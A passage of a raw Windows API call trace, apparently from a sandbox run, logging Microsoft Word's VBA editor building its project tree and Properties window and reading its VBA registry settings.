lpString1="Microsoft Word", lpString2=" " | out: lpString1="Microsoft Word ") returned="Microsoft Word " [0041.549] lstrcatA (in: lpString1="Microsoft Word ", lpString2="Objects" | out: lpString1="Microsoft Word Objects") returned="Microsoft Word Objects" [0041.549] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185950) returned 0x1 [0041.549] GetObjectA (in: h=0x90508b4, c=32, pv=0x185c60 | out: pv=0x185c60) returned 32 [0041.549] GetDC (hWnd=0x0) returned 0x1801025d [0041.549] GetDeviceCaps (hdc=0x1801025d, index=90) returned 96 [0041.549] DeleteDC (hdc=0x1801025d) returned 1 [0041.549] GetDC (hWnd=0x0) returned 0x1801025d [0041.549] GetDeviceCaps (hdc=0x1801025d, index=88) returned 96 [0041.549] DeleteDC (hdc=0x1801025d) returned 1 [0041.549] GetObjectA (in: h=0x90508b4, c=32, pv=0x185bd0 | out: pv=0x185bd0) returned 32 [0041.549] ImageList_AddMasked (himl=0x32f4a0, hbmImage=0x90508b4, crMask=0xff00ff) returned 21 [0041.549] _msize (_Block=0x2749430) returned 0x14 [0041.549] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185d70) returned 0x6a69180 [0041.550] lstrlenA (lpString="ThisDocument") returned 12 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185ab0) returned 0x1 [0041.550] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185ae8 | out: lpsi=0x185ae8) returned 1 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a69180) returned 0x6a69120 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x6a69120) returned 0x1 [0041.550] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185b08 | out: lpsi=0x185b08) returned 1 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.550] SendMessageA (hWnd=0x10204, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10206 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a68e80) returned 0x6a67800 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185f88) returned 0x1 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a67800) returned 0x6a68f40 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185f88) returned 0x1 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a68f40) returned 0x6a69000 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185f88) returned 0x1 [0041.550] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a69000) returned 0x0 [0041.550] wcsncpy_s (in: _Destination=0x185c50, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.550] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x185b80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.550] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.551] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x7ec, lpBuffer=0x185d20, cchBufferMax=256 | out: lpBuffer="References") returned 0xa [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185b90) returned 0x1 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a691e0) returned 0x6a68e80 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185ce0) returned 0x1 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x1100, wParam=0x0, lParam=0x185c80) returned 0x6a69240 [0041.551] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x845, lpBuffer=0x185a00, cchBufferMax=521 | out: lpBuffer="Reference to ") returned 0xd [0041.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x1858e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.551] lstrcpynA (in: lpString1=0x1858f0, lpString2="Normal", iMaxLength=260 | out: lpString1="Normal") returned="Normal" [0041.551] strncat_s (in: _Destination="Reference to ", _SizeInBytes=0x209, _Source="Normal", _MaxCount=0x28 | out: _Destination="Reference to Normal") returned 0x0 [0041.551] lstrlenA (lpString="Normal") returned 6 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110d, wParam=0x0, lParam=0x185810) returned 0x1 [0041.551] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185848 | out: lpsi=0x185848) returned 1 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x3, lParam=0x6a69240) returned 0x6a691e0 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x1113, wParam=0x0, lParam=0x6a691e0) returned 0x1 [0041.551] GetScrollInfo (in: hwnd=0x1020a, nBar=0, lpsi=0x185868 | out: lpsi=0x185868) returned 1 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x4, lParam=0x6a690c0) returned 0x6a69120 [0041.551] SendMessageA (hWnd=0x1020a, Msg=0x110c, wParam=0x0, lParam=0x185f88) returned 0x1 [0041.552] SendMessageA (hWnd=0x1020a, Msg=0x110a, wParam=0x1, lParam=0x6a69120) returned 0x0 [0041.552] SendMessageA (hWnd=0x1020a, Msg=0x110b, wParam=0x9, lParam=0x6a690c0) returned 0x1 [0041.553] lstrcpyA (in: lpString1=0x185d90, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.553] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185d60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.553] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.553] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f20 | out: phkResult=0x185f20*=0xa18) returned 0x0 [0041.554] RegQueryValueExA (in: hKey=0xa18, lpValueName="Tool", lpReserved=0x0, lpType=0x185f78, lpData=0x0, lpcbData=0x185f70*=0x0 | out: lpType=0x185f78*=0x0, lpData=0x0, lpcbData=0x185f70*=0x0) returned 0x2 [0041.554] RegCloseKey (hKey=0xa18) returned 0x0 [0041.554] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x330c, lpBuffer=0x183f30, cchBufferMax=512 | out: lpBuffer="General") returned 0x7 [0041.554] lstrcpyA (in: lpString1=0x274f420, lpString2="General" | out: lpString1="General") returned="General" [0041.561] qsort (in: _Base=0x274f440, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee448b4e4 | out: _Base=0x274f440) [0041.561] _msize (_Block=0x274f440) returned 0x1c0 [0041.561] RegisterClipboardFormatA (lpszFormat="CLSID") returned 0xc1a0 [0041.561] RegisterClipboardFormatA (lpszFormat="DesignerToolboxItem") returned 0xc1a1 [0041.561] RegisterClipboardFormatA (lpszFormat="ClsdIdClassName") returned 0xc1a2 [0041.561] CoCreateGuid (in: pguid=0x7fee4611248 | out: pguid=0x7fee4611248*(Data1=0x5061021b, Data2=0x4546, Data3=0x4c66, Data4=([0]=0x8e, [1]=0x46, [2]=0x5b, [3]=0x83, [4]=0x60, [5]=0xc7, [6]=0x89, [7]=0x5c))) returned 0x0 [0041.561] RegisterClassA (lpWndClass=0x186010) returned 0x1c4d016ac1a3 [0041.561] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001bc) returned 1 [0041.561] GetDialogBaseUnits () returned 1048584 [0041.561] GetSystemMetrics (nIndex=46) returned 2 [0041.561] LoadBitmapA (hInstance=0x7fee4230000, lpBitmapName=0x406) returned 0x90508b5 [0041.561] GetObjectA (in: h=0x90508b5, c=32, pv=0x185ff0 | out: pv=0x185ff0) returned 32 [0041.561] DeleteObject (ho=0x90508b5) returned 1 [0041.561] CreateWindowExA (dwExStyle=0x10, lpClassName="ToolsPalette", lpWindowName=0x0, dwStyle=0x44000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1020c [0041.562] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x81, wParam=0x0, lParam=0x185950) returned 0x1 [0041.562] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x83, wParam=0x0, lParam=0x1859b0) returned 0x0 [0041.562] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x1, wParam=0x0, lParam=0x185950) returned 0x0 [0041.562] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0041.562] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0041.562] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001bd) returned 1 [0041.562] RegisterClassA (lpWndClass=0x185f90) returned 0x1c510170c1a4 [0041.562] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001be) returned 1 [0041.562] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0041.562] RegisterClassA (lpWndClass=0x185f90) returned 0x7600182c1a5 [0041.562] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001bf) returned 1 [0041.562] GetDC (hWnd=0x0) returned 0x1801025d [0041.562] SelectObject (hdc=0x1801025d, h=0x30a08b2) returned 0x18a002e [0041.562] GetTextExtentPointA (in: hdc=0x1801025d, lpString="0", c=1, lpsz=0x185f20 | out: lpsz=0x185f20) returned 1 [0041.562] ReleaseDC (hWnd=0x0, hDC=0x1801025d) returned 1 [0041.562] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x334a, lpBuffer=0x183ef0, cchBufferMax=512 | out: lpBuffer="Properties") returned 0xa [0041.563] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc1a4, lpWindowName="Properties", dwStyle=0x46000000, X=0, Y=0, nWidth=180, nHeight=71, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1020e [0041.563] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001c0) returned 1 [0041.563] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x186018 | out: lpmi=0x186018) returned 1 [0041.563] CreateWindowExA (dwExStyle=0x80, lpClassName=0xc1a5, lpWindowName="Properties", dwStyle=0x82ce0000, X=4, Y=24, nWidth=180, nHeight=720, hWndParent=0x101ea, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10210 [0041.563] SendMessageA (hWnd=0x1020e, Msg=0x24, wParam=0x0, lParam=0x185920) returned 0x0 [0041.564] IsIconic (hWnd=0x10210) returned 0 [0041.564] IsZoomed (hWnd=0x10210) returned 0 [0041.564] GetWindowRect (in: hWnd=0x10210, lpRect=0x7fee4610ff8 | out: lpRect=0x7fee4610ff8) returned 1 [0041.564] IsIconic (hWnd=0x10210) returned 0 [0041.564] IsZoomed (hWnd=0x10210) returned 0 [0041.564] GetWindowRect (in: hWnd=0x10210, lpRect=0x7fee4610ff8 | out: lpRect=0x7fee4610ff8) returned 1 [0041.564] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001c1) returned 1 [0041.564] lstrcpyA (in: lpString1=0x185c60, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.564] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185c30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.564] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.564] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185df8 | out: phkResult=0x185df8*=0xa18) returned 0x0 [0041.565] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x823, lpBuffer=0x185e00, cchBufferMax=40 | out: lpBuffer="PropertiesWindow") returned 0x10 [0041.565] RegQueryValueExA (in: hKey=0xa18, lpValueName="PropertiesWindow", lpReserved=0x0, lpType=0x0, lpData=0x185ec0, lpcbData=0x185df0*=0x1e | out: lpType=0x0, lpData=0x185ec0*=0x4, lpcbData=0x185df0*=0x1e) returned 0x2 [0041.565] RegCloseKey (hKey=0xa18) returned 0x0 [0041.565] lstrcpyA (in: lpString1=0x185ec0, lpString2="" | out: lpString1="") returned="" [0041.565] lstrlenA (lpString="") returned 0 [0041.565] MonitorFromWindow (hwnd=0x10210, dwFlags=0x2) returned 0x10001 [0041.565] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x185e08 | out: lpmi=0x185e08) returned 1 [0041.565] GetWindowLongA (hWnd=0x10210, nIndex=-16) returned -2033319936 [0041.565] IsZoomed (hWnd=0x10210) returned 0 [0041.565] GetWindowRect (in: hWnd=0x10210, lpRect=0x185de8 | out: lpRect=0x185de8) returned 1 [0041.565] CreateWindowExA (dwExStyle=0x200, lpClassName="ComboBox", lpWindowName="Properties", dwStyle=0x50a00313, X=0, Y=3, nWidth=179, nHeight=18, hWndParent=0x1020e, hMenu=0x1000, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10212 [0041.570] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001c2) returned 1 [0041.570] SendMessageA (hWnd=0x10212, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x1 [0041.570] CreateWindowExA (dwExStyle=0x0, lpClassName="SysTabControl32", lpWindowName="Properties", dwStyle=0x54001000, X=0, Y=24, nWidth=179, nHeight=0, hWndParent=0x1020e, hMenu=0x1001, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10216 [0041.571] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001c6) returned 1 [0041.571] SendMessageA (hWnd=0x10216, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x0 [0041.572] CreateWindowExA (dwExStyle=0x200, lpClassName="ListBox", lpWindowName="Properties", dwStyle=0x54a10513, X=0, Y=0, nWidth=1, nHeight=30, hWndParent=0x1020e, hMenu=0x1002, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10218 [0041.574] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001c8) returned 1 [0041.574] SendMessageA (hWnd=0x10218, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x0 [0041.574] CreateWindowExA (dwExStyle=0x0, lpClassName="Button", lpWindowName="Properties", dwStyle=0x4000000b, X=0, Y=0, nWidth=17, nHeight=16, hWndParent=0x1020e, hMenu=0x1003, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1021a [0041.576] qsort (in: _Base=0x274f5f0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee448b4e4 | out: _Base=0x274f5f0) [0041.576] _msize (_Block=0x274f5f0) returned 0x1c0 [0041.577] CreateSolidBrush (color=0xf0f0f0) returned 0x61008b7 [0041.610] NtdllDefWindowProc_A (hWnd=0x1020c, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0041.610] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001ca) returned 1 [0041.610] CreateWindowExA (dwExStyle=0x0, lpClassName="Edit", lpWindowName="Properties", dwStyle=0x40000080, X=0, Y=0, nWidth=0, nHeight=16, hWndParent=0x1020e, hMenu=0x1004, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1021c [0041.612] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001cc) returned 1 [0041.612] SendMessageA (hWnd=0x1021c, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x1 [0041.612] CreateWindowExA (dwExStyle=0x80, lpClassName="ListBox", lpWindowName="Properties", dwStyle=0x44a00003, X=0, Y=0, nWidth=0, nHeight=15, hWndParent=0x1020e, hMenu=0x1005, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1021e [0041.614] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001ce) returned 1 [0041.614] SendMessageA (hWnd=0x1021e, Msg=0x30, wParam=0x30a08b2, lParam=0x0) returned 0x0 [0041.614] SetWindowLongA (hWnd=0x1021e, nIndex=-12, dwNewLong=0) returned 4101 [0041.614] SetParent (hWndChild=0x1021e, hWndNewParent=0x0) returned 0x1020e [0041.614] GetWindowLongA (hWnd=0x1021e, nIndex=-16) returned 1149239299 [0041.614] SetWindowLongA (hWnd=0x1021e, nIndex=-16, dwNewLong=-2071986173) returned 1149239299 [0041.614] SendMessageA (hWnd=0x1021c, Msg=0xd3, wParam=0x1, lParam=0x0) returned 0x0 [0041.614] GetWindowLongPtrA (hWnd=0x1021e, nIndex=-4) returned 0xffff0209 [0041.614] SetWindowLongPtrA (hWnd=0x1021e, nIndex=-4, dwNewLong=0x7fee423f290) returned 0xffff0209 [0041.614] SetWindowLongPtrA (hWnd=0x10218, nIndex=-4, dwNewLong=0x7fee423eb78) returned 0xffff0209 [0041.614] GetWindowLongPtrA (hWnd=0x10212, nIndex=-4) returned 0xffff020b [0041.614] SetWindowLongPtrA (hWnd=0x10212, nIndex=-4, dwNewLong=0x7fee42411a8) returned 0xffff020b [0041.614] SendMessageA (hWnd=0x10212, Msg=0x143, wParam=0x0, lParam=0x7fee45c773e) returned 0x0 [0041.616] SendMessageA (hWnd=0x10212, Msg=0x143, wParam=0x0, lParam=0x7fee45c773e) returned 0x0 [0041.618] SendMessageA (hWnd=0x10212, Msg=0x100, wParam=0x28, lParam=0xc9500001) returned 0x0 [0041.618] SendMessageA (hWnd=0x10212, Msg=0x147, wParam=0x0, lParam=0x0) returned 0x0 [0041.618] SendMessageA (hWnd=0x10212, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0041.619] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x351b, lpBuffer=0x1855e0, cchBufferMax=1024 | out: lpBuffer="Object") returned 0x6 [0041.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185ab0, cbMultiByte=-1, lpWideCharStr=0x68e8c88, cchWideChar=7 | out: lpWideCharStr="Object") returned 7 [0041.619] CoCreateInstance (in: rclsid=0x7fee45ec298*(Data1=0xb5f8350b, Data2=0x548, Data3=0x48b1, Data4=([0]=0xa6, [1]=0xee, [2]=0x88, [3]=0xbd, [4]=0x0, [5]=0xb4, [6]=0xa5, [7]=0xe7)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee45ec288*(Data1=0x6e26e776, Data2=0x4f0, Data3=0x495d, Data4=([0]=0x80, [1]=0xe4, [2]=0x33, [3]=0x30, [4]=0x35, [5]=0x2e, [6]=0x31, [7]=0x69)), ppv=0x185ea8 | out: ppv=0x185ea8*=0x6c32cb0) returned 0x0 [0041.619] CAccPropServices:IAccPropServices:SetHwndPropStr (This=0x6c32cb0, hwnd=0x10212, idObject=0xfffffffc, idChild=0x0, idProp=0x185eb0, str="Object") returned 0x0 [0041.620] CAccPropServices:IUnknown:Release (This=0x6c32cb0) returned 0x0 [0041.620] GetWindowLongPtrA (hWnd=0x1021c, nIndex=-4) returned 0xffff020d [0041.620] SetWindowLongPtrA (hWnd=0x1021c, nIndex=-4, dwNewLong=0x7fee423f05c) returned 0xffff020d [0041.620] GetWindowLongPtrA (hWnd=0x1021a, nIndex=-4) returned 0xffff020f [0041.620] SetWindowLongPtrA (hWnd=0x1021a, nIndex=-4, dwNewLong=0x7fee4246e70) returned 0xffff020f [0041.620] GetWindowLongPtrA (hWnd=0x10216, nIndex=-4) returned 0xffff0211 [0041.620] SetWindowLongPtrA (hWnd=0x10216, nIndex=-4, dwNewLong=0x7fee42466b4) returned 0xffff0211 [0041.620] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x342c, lpBuffer=0x183ef0, cchBufferMax=512 | out: lpBuffer="Alphabetic") returned 0xa [0041.620] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x1307, wParam=0x0, lParam=0x185fe0) returned 0x0 [0041.621] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x342d, lpBuffer=0x183ef0, cchBufferMax=512 | out: lpBuffer="Categorized") returned 0xb [0041.621] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x1307, wParam=0x1, lParam=0x185fe0) returned 0x1 [0041.621] SendMessageA (hWnd=0x10216, Msg=0x1328, wParam=0x0, lParam=0x186008) returned 0x0 [0041.621] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x1328, wParam=0x0, lParam=0x186008) returned 0x0 [0041.622] GetDC (hWnd=0x10218) returned 0x350108b5 [0041.622] lstrlenA (lpString="Object.") returned 7 [0041.622] GetTextExtentPointA (in: hdc=0x350108b5, lpString="Object.", c=7, lpsz=0x185f80 | out: lpsz=0x185f80) returned 1 [0041.622] ReleaseDC (hWnd=0x10218, hDC=0x350108b5) returned 1 [0041.622] lstrcpyA (in: lpString1=0x185b50, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.622] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185b20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.622] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.622] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185ce0 | out: phkResult=0x185ce0*=0xa24) returned 0x0 [0041.622] RegQueryValueExA (in: hKey=0xa24, lpValueName="UI", lpReserved=0x0, lpType=0x185d38, lpData=0x0, lpcbData=0x185d30*=0x0 | out: lpType=0x185d38*=0x0, lpData=0x0, lpcbData=0x185d30*=0x0) returned 0x2 [0041.622] RegCloseKey (hKey=0xa24) returned 0x0 [0041.631] GetClientRect (in: hWnd=0x10208, lpRect=0x185b80 | out: lpRect=0x185b80) returned 1 [0041.632] GetClientRect (in: hWnd=0x10208, lpRect=0x185b80 | out: lpRect=0x185b80) returned 1 [0041.632] IMalloc:Alloc (This=0x7feffc15380, cb=0x600) returned 0x6cafca0 [0041.639] IMalloc:Free (This=0x7feffc15380, pv=0x6cafca0) [0041.648] IsIconic (hWnd=0x10202) returned 0 [0041.648] GetClientRect (in: hWnd=0x10202, lpRect=0x185b70 | out: lpRect=0x185b70) returned 1 [0041.650] IsIconic (hWnd=0x10202) returned 0 [0041.650] GetClientRect (in: hWnd=0x10202, lpRect=0x185a50 | out: lpRect=0x185a50) returned 1 [0041.663] IsIconic (hWnd=0x10202) returned 0 [0041.663] GetClientRect (in: hWnd=0x10202, lpRect=0x185690 | out: lpRect=0x185690) returned 1 [0041.663] IsIconic (hWnd=0x10202) returned 0 [0041.663] GetClientRect (in: hWnd=0x10202, lpRect=0x185690 | out: lpRect=0x185690) returned 1 [0041.664] SelectObject (hdc=0x350108b5, h=0xe0a08b8) returned 0x18a002e [0041.664] GetTextExtentPoint32A (in: hdc=0x350108b5, lpString="000000 x 000000", c=15, psizl=0x1857e8 | out: psizl=0x1857e8) returned 1 [0041.666] IsIconic (hWnd=0x10202) returned 0 [0041.666] GetClientRect (in: hWnd=0x10202, lpRect=0x185690 | out: lpRect=0x185690) returned 1 [0041.668] IsIconic (hWnd=0x10202) returned 0 [0041.668] GetClientRect (in: hWnd=0x10202, lpRect=0x1859f0 | out: lpRect=0x1859f0) returned 1 [0041.673] GetClientRect (in: hWnd=0x10208, lpRect=0x185b70 | out: lpRect=0x185b70) returned 1 [0041.675] GetClientRect (in: hWnd=0x10208, lpRect=0x185a50 | out: lpRect=0x185a50) returned 1 [0041.676] GetClientRect (in: hWnd=0x10208, lpRect=0x185690 | out: lpRect=0x185690) returned 1 [0041.676] GetClientRect (in: hWnd=0x10208, lpRect=0x185690 | out: lpRect=0x185690) returned 1 [0041.676] IsWindow (hWnd=0x10208) returned 1 [0041.676] GetClientRect (in: hWnd=0x10208, lpRect=0x185a10 | out: lpRect=0x185a10) returned 1 [0041.676] GetSystemMetrics (nIndex=2) returned 17 [0041.676] MoveWindow (hWnd=0x1020a, X=-1, Y=27, nWidth=102, nHeight=74, bRepaint=1) returned 1 [0041.679] GetClientRect (in: hWnd=0x10208, lpRect=0x1859f0 | out: lpRect=0x1859f0) returned 1 [0041.682] lstrcpyA (in: lpString1=0x185ec0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.683] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185e90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.683] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.683] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x186080 | out: phkResult=0x186080*=0xa2c) returned 0x0 [0041.683] RegQueryValueExA (in: hKey=0xa2c, lpValueName="Dock", lpReserved=0x0, lpType=0x186078, lpData=0x0, lpcbData=0x186070*=0x0 | out: lpType=0x186078*=0x0, lpData=0x0, lpcbData=0x186070*=0x0) returned 0x2 [0041.683] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185d70 | out: lpPoint=0x185d70) returned 1 [0041.683] CopyRect (in: lprcDst=0x185d78, lprcSrc=0x185e08 | out: lprcDst=0x185d78) returned 1 [0041.683] OffsetRect (in: lprc=0x185d78, dx=-8, dy=-30 | out: lprc=0x185d78) returned 1 [0041.683] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185d70 | out: lpPoint=0x185d70) returned 1 [0041.684] CopyRect (in: lprcDst=0x185d78, lprcSrc=0x185e08 | out: lprcDst=0x185d78) returned 1 [0041.684] OffsetRect (in: lprc=0x185d78, dx=-8, dy=-30 | out: lprc=0x185d78) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185e10 | out: lpPoint=0x185e10) returned 1 [0041.684] CopyRect (in: lprcDst=0x185e18, lprcSrc=0x185ea8 | out: lprcDst=0x185e18) returned 1 [0041.684] OffsetRect (in: lprc=0x185e18, dx=-8, dy=-30 | out: lprc=0x185e18) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185cd0 | out: lpPoint=0x185cd0) returned 1 [0041.684] CopyRect (in: lprcDst=0x185cd8, lprcSrc=0x185d68 | out: lprcDst=0x185cd8) returned 1 [0041.684] OffsetRect (in: lprc=0x185cd8, dx=-8, dy=-30 | out: lprc=0x185cd8) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185cd0 | out: lpPoint=0x185cd0) returned 1 [0041.684] CopyRect (in: lprcDst=0x185cd8, lprcSrc=0x185d68 | out: lprcDst=0x185cd8) returned 1 